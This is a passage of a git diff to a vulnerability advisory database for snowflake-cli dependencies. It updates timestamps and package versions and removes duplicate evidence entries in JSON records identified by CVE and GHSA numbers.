"GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2023-32681.json b/advisories/BREW-snowflake-cli-CVE-2023-32681.json index 2783ffcd929..24d6251b079 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-32681.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-32681", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2023-34233.json b/advisories/BREW-snowflake-cli-CVE-2023-34233.json index 13b2649ae44..ec42106d33a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-34233.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-34233.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-34233", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5w5m-pfw9-c8fp", "CVE-2023-34233", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.0.2", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2023-40267.json b/advisories/BREW-snowflake-cli-CVE-2023-40267.json index 1cce398d053..816f7f23c26 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-40267.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-40267.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-40267", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-pr76-5cm5-w9cj", "CVE-2023-40267", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.32", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2023-40590.json b/advisories/BREW-snowflake-cli-CVE-2023-40590.json index 3c832526158..85075e8e900 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-40590.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-40590.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-40590", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-wfm5-v35h-vwf4", "CVE-2023-40590", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.33", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2023-41040.json b/advisories/BREW-snowflake-cli-CVE-2023-41040.json index 91ba195ac24..82a0c28bc10 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-41040.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-41040.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-41040", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-cwvm-v4w8-q58c", "CVE-2023-41040", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.37", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2023-43804.json b/advisories/BREW-snowflake-cli-CVE-2023-43804.json index b5980ea31bc..a754c7ff28a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-43804.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-43804", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2023-45803.json b/advisories/BREW-snowflake-cli-CVE-2023-45803.json index 5a53aaa1b95..3652677d8cc 100644 --- a/advisories/BREW-snowflake-cli-CVE-2023-45803.json +++ b/advisories/BREW-snowflake-cli-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2023-45803", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-22190.json b/advisories/BREW-snowflake-cli-CVE-2024-22190.json index aa3218bca93..bb5c8c91fe5 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-22190.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-22190.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-22190", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:47:20Z", + "modified": "2026-09-10T20:56:16Z", "upstream": [ "GHSA-2mqj-m65w-jghx", "CVE-2024-22190", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.1.41", "resource": "gitpython", - "resource_purl": "pkg:pypi/gitpython@3.1.58" + "resource_purl": "pkg:pypi/gitpython@3.1.59" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", - "resource": "gitpython" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.58", - "key": "pkg:pypi/gitpython@3.1.58", + "subject_version": "3.1.59", + "key": "pkg:pypi/gitpython@3.1.59", "resource": "gitpython" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2024-22195.json b/advisories/BREW-snowflake-cli-CVE-2024-22195.json index c63479f69c0..b3414c22cf1 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-22195.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-22195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-22195", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-h5c8-rqwp-cp95", "CVE-2024-22195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-34064.json b/advisories/BREW-snowflake-cli-CVE-2024-34064.json index 2ead64bc1c9..fc1de9488df 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-34064.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-34064.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-34064", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-h75v-3vvj-5mfj", "CVE-2024-34064", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-35195.json b/advisories/BREW-snowflake-cli-CVE-2024-35195.json index 893d2cf7fc8..75b90d2f638 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-35195.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-35195", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-3651.json b/advisories/BREW-snowflake-cli-CVE-2024-3651.json index 2e473a060a9..c90197c5922 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-3651.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-3651", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-26T09:49:15Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-37891.json b/advisories/BREW-snowflake-cli-CVE-2024-37891.json index c9cf7d77e5a..cf59430070a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-37891.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-37891", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-47081.json b/advisories/BREW-snowflake-cli-CVE-2024-47081.json index df3dac2ce55..635d91ebb97 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-47081.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-47081", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.33.0", - "key": "pkg:pypi/requests@2.33.0", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-49750.json b/advisories/BREW-snowflake-cli-CVE-2024-49750.json index d2d8f2e5214..bd653f68d94 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-49750.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-49750.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-49750", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5vvg-pvhp-hv2m", "CVE-2024-49750", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.12.3", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2024-53861.json b/advisories/BREW-snowflake-cli-CVE-2024-53861.json index b12726f113e..0b8ec42dfcf 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-53861.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-53861", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-56201.json b/advisories/BREW-snowflake-cli-CVE-2024-56201.json index 34fd4e9b1e2..eca11633b14 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-56201.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-56201.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-56201", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-gmj6-6f8f-6699", "CVE-2024-56201", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-56326.json b/advisories/BREW-snowflake-cli-CVE-2024-56326.json index ca9ab83fe23..11be2107588 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-56326.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-56326.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-56326", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-q2x7-8rv6-6q7h", "CVE-2024-56326", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2024-6345.json b/advisories/BREW-snowflake-cli-CVE-2024-6345.json index 81f0f69cac1..b1de3d89366 100644 --- a/advisories/BREW-snowflake-cli-CVE-2024-6345.json +++ b/advisories/BREW-snowflake-cli-CVE-2024-6345.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2024-6345", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-cx63-2mw6-8hw5", "BIT-setuptools-2024-6345", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-24793.json b/advisories/BREW-snowflake-cli-CVE-2025-24793.json index 4a32cf75aa8..fd95c85a7af 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-24793.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-24793.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-24793", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-2vpq-fh52-j3wv", "CVE-2025-24793", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.13.1", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2025-24794.json b/advisories/BREW-snowflake-cli-CVE-2025-24794.json index ea44643456f..b829487b5f9 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-24794.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-24794.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-24794", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-m4f6-vcj4-w5mx", "CVE-2025-24794", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.13.1", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2025-24795.json b/advisories/BREW-snowflake-cli-CVE-2025-24795.json index a2a5569ac84..17d4ce50318 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-24795.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-24795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-24795", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-r2x6-cjg7-8r43", "CVE-2025-24795", @@ -33,7 +33,7 @@ "range_state": "fixed", "upstream_fixed_in": "3.13.1", "resource": "snowflake-connector-python", - "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.1" + "resource_purl": "pkg:pypi/snowflake-connector-python@4.7.3" } } ], @@ -46,16 +46,8 @@ "strategy": "registry", "ecosystem": "PyPI", "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", - "resource": "snowflake-connector-python" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "snowflake-connector-python", - "subject_version": "4.7.1", - "key": "pkg:pypi/snowflake-connector-python@4.7.1", + "subject_version": "4.7.3", + "key": "pkg:pypi/snowflake-connector-python@4.7.3", "resource": "snowflake-connector-python" } ] diff --git a/advisories/BREW-snowflake-cli-CVE-2025-27516.json b/advisories/BREW-snowflake-cli-CVE-2025-27516.json index 351ebc496f2..c4562294b5d 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-27516.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-27516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-27516", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-cpwx-vrp4-4pq7", "CVE-2025-27516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jinja2", - "subject_version": "3.1.6", - "key": "pkg:pypi/jinja2@3.1.6", - "resource": "jinja2" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-4565.json b/advisories/BREW-snowflake-cli-CVE-2025-4565.json index cd94b3fdc42..5eaf061633a 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-4565.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-4565.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-4565", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-8qvm-5x2c-j2w7", "CVE-2025-4565", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "protobuf", - "subject_version": "5.29.6", - "key": "pkg:pypi/protobuf@5.29.6", - "resource": "protobuf" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-47273.json b/advisories/BREW-snowflake-cli-CVE-2025-47273.json index ec9089f836c..5630195324c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-47273.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-47273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-47273", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-5rjg-fvgr-3xxf", "BIT-setuptools-2025-47273", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "80.8.0", - "key": "pkg:pypi/setuptools@80.8.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-50181.json b/advisories/BREW-snowflake-cli-CVE-2025-50181.json index 86788babb4e..440782712da 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-50181.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-50181", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-50182.json b/advisories/BREW-snowflake-cli-CVE-2025-50182.json index 2df8481ad63..ba296857053 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-50182.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-50182", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-66418.json b/advisories/BREW-snowflake-cli-CVE-2025-66418.json index 62b01c79b25..1b1d5c1863c 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-66418.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-snowflake-cli-CVE-2025-66418", "published": "2026-08-13T17:35:47Z", - "modified": "2026-08-13T17:35:47Z", + "modified": "2026-09-10T20:56:30Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-snowflake-cli-CVE-2025-66471.json b/advisories/BREW-snowflake-cli-CVE-2025-66471.json index 729b92fd433..1542ed2e6da 100644 --- a/advisories/BREW-snowflake-cli-CVE-2025-66471.json +++ b/advisories/BREW-snowflake-cli-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", 